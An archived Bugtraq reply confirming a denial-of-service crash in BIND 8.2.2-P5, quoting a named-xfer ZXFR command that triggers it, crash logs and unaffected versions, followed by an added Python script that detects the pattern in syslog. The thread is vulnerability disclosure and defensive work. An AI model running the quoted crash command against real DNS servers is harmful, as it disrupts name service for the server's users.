[17568] in bugtraq
Re: BIND 8.2.2-P5 Possible DOS
daemon@ATHENA.MIT.EDU (Walter Hop)
Thu Nov 9 02:11:04 2000
Message-Id: <153031338.20001108210527@skydancer.nl>
Date: Wed, 8 Nov 2000 21:05:27 +0100
Reply-To: Walter Hop <walter@SKYDANCER.NL>
From: Walter Hop <walter@SKYDANCER.NL>
X-To: "Fabio Pietrosanti (naif)" <naif@inet.it>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.30.0011071339510.29294-100000@naif.inet.it>
[in reply to fabio@TELEMAIL.IT, 07-11-2000]
> <naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com
> named-xfer[29297]: send AXFR query 0 to 192.168.1.1
> named-xfer[29297]: premature EOF, fetching "zone.pippo.com"
>
> Then the server "*** CRASHED ***".
> I should assume that bind 8.2.2-P5 is vulnerable (please someone test
> and confirm this kind of DoS)

Yes; I got BIND-8.2.2-P5 on a RH5.2/Linux 2.0.38 box to die using the above
command. These were the last log messages:

  Nov 8 20:36:06 cascade named[396]: unsupported XFR (type ZXFR) of
  "xxx.nl" (IN) to [xxx.xxx.xxx.xxx].4174
  Nov 8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set
  Nov 8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set

I haven't been able to reproduce this on:

  BIND-8.2.2-P5 on RH6.1, Linux 2.2.12-20smp
  BIND-8.2.2-P5-NOESW on FreeBSD 3.4-RELEASE
  BIND-8.2.3-T5B on FreeBSD 4.1-RELEASE

--
Walter Hop <walter@skydancer.nl> | +31 6 24290808 | PGP: 0xD4DD8DEB
Mail agreement-request@skydancer.nl to retrieve the email agreement.
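
Added example, not part of the original message or of BIND: a log check for the sequence reported above, a refused ZXFR transfer followed by "db_freedata: DB_F_FREE set" errors from the same named process. The sample log is constructed from the excerpt in the message (the PID 511 line is invented as a benign case); the function names, the 5-minute window and the year are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample modelled on the log excerpt in the message, including the
# mail-wrapped first line; the last line (PID 511) is invented as a benign case.
SAMPLE = """\
Nov 8 20:36:06 cascade named[396]: unsupported XFR (type ZXFR) of
"xxx.nl" (IN) to [xxx.xxx.xxx.xxx].4174
Nov 8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set
Nov 8 20:36:55 cascade named[396]: db_freedata: DB_F_FREE set
Nov 8 21:10:00 cascade named[511]: unsupported XFR (type ZXFR) of "xxx.nl" (IN) to [xxx.xxx.xxx.xxx].4180
"""

LINE = re.compile(r'^(\w{3}\s+\d+ \d\d:\d\d:\d\d) (\S+) named\[(\d+)\]: (.*)$')
ZXFR = re.compile(r'unsupported XFR \(type ZXFR\) of "([^"]+)" \(IN\) to \[([^\]]+)\]')
FREED = "db_freedata: DB_F_FREE set"

def unwrap(text):
    """Join wrapped continuation lines onto the syslog line they belong to."""
    out = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        if LINE.match(raw) or not out:
            out.append(raw)
        else:
            out[-1] += " " + raw
    return out

def find_zxfr_incidents(text, window=timedelta(minutes=5), year=2000):
    """One record per refused ZXFR; counts db_freedata errors that the same
    named process (host, PID) logs within `window` afterwards."""
    incidents, last = [], {}
    for line in unwrap(text):
        m = LINE.match(line)
        if not m:
            continue
        stamp, host, pid, msg = m.groups()
        # syslog omits the year; `year` is an assumption supplied by the caller
        when = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        z = ZXFR.search(msg)
        if z:
            inc = {"time": when, "host": host, "pid": pid, "zone": z.group(1),
                   "client": z.group(2), "freed_errors": 0}
            incidents.append(inc)
            last[(host, pid)] = inc
        elif FREED in msg and (host, pid) in last:
            if when - last[(host, pid)]["time"] <= window:
                last[(host, pid)]["freed_errors"] += 1
    return incidents
```

A record with freed_errors greater than zero matches the pattern in the log excerpt; a refused ZXFR with no following errors is the case the other three systems listed would produce.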